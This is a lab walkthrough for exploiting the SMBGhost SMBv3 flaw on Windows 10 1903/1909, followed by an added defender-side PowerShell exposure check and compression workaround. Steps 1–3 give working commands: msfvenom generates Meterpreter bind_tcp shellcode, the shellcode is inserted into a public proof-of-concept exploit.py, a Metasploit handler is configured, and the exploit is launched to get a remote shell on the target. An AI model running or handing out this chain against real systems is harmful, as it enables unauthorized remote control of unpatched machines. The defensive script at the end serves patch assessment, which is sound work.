Environment:
Target: 192.168.107.74, Windows 10 Pro 1903
Attacker: 192.168.103.61
Affected versions:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Corresponding patch:
KB4551762
Step 1:
Use MSF (msfvenom) to generate the Meterpreter shellcode in Python format:
msfvenom -p windows/x64/meterpreter/bind_tcp lport=2006 -f py -o evil.py
Step 2:
Replace the USER_PAYLOAD section of exploit.py in the SMBGhost_RCE_PoC folder with the payload from the evil.py script; at the same time, start a bind (forward) handler in MSF:
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.107.74
set lport 2006
run
Step 3:
# Attack: the script opens port 2006 on the target, so MSF can connect to it.
python3 exploit.py -ip 192.168.107.74
# A small problem I ran into: when the environment is on a wireless LAN, it keeps reporting socket timeout errors; on a wired LAN it works normally.
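The defender-side counterpart to the walkthrough above, as an added example that is not part of the original write-up: a PowerShell check, run on a host like the Windows 10 1903 target, that reports whether the build is in the affected range listed above, whether the patch named on the page (KB4551762) is installed, and whether Microsoft's documented SMBv3 compression workaround is in place. The function name Test-SMBGhostExposure and the use of ReleaseId as the version test are my own choices; the registry paths and cmdlets are standard Windows ones.

```powershell
# Added defender-side check; not part of the original walkthrough.
# Run in an elevated PowerShell session on the host being assessed.
function Test-SMBGhostExposure {
    $cv     = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

    # Releases listed on the page as affected; ReleaseId reads "1903"/"1909" for these builds.
    $affectedReleases = @('1903', '1909')
    $releaseId = (Get-ItemProperty -Path $cv -Name ReleaseId -ErrorAction SilentlyContinue).ReleaseId
    $inRange   = $affectedReleases -contains $releaseId

    # Is the update named on the page installed? (A later cumulative update supersedes it,
    # so an absent entry alone does not prove the host is unpatched.)
    $patched = [bool](Get-HotFix -Id 'KB4551762' -ErrorAction SilentlyContinue)

    # Microsoft's documented workaround: DisableCompression = 1 on the SMB server service.
    $dc = (Get-ItemProperty -Path $lanman -Name DisableCompression -ErrorAction SilentlyContinue).DisableCompression
    $compressionDisabled = ($dc -eq 1)

    [pscustomobject]@{
        ReleaseId              = $releaseId
        InAffectedRange        = $inRange
        KB4551762Installed     = $patched
        SMBCompressionDisabled = $compressionDisabled
        # Exposed only if in the affected range and neither the patch nor the workaround is present.
        LikelyExposed          = $inRange -and -not $patched -and -not $compressionDisabled
    }
}

# Apply the workaround until the update can be installed (elevation required):
function Disable-SMBCompression {
    $lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    Set-ItemProperty -Path $lanman -Name DisableCompression -Type DWORD -Value 1 -Force
}

Test-SMBGhostExposure | Format-List
```

Because the exploit needs a reachable SMB port 445, blocking inbound 445 at the host firewall is the complementary network-level mitigation while the patch is rolled out.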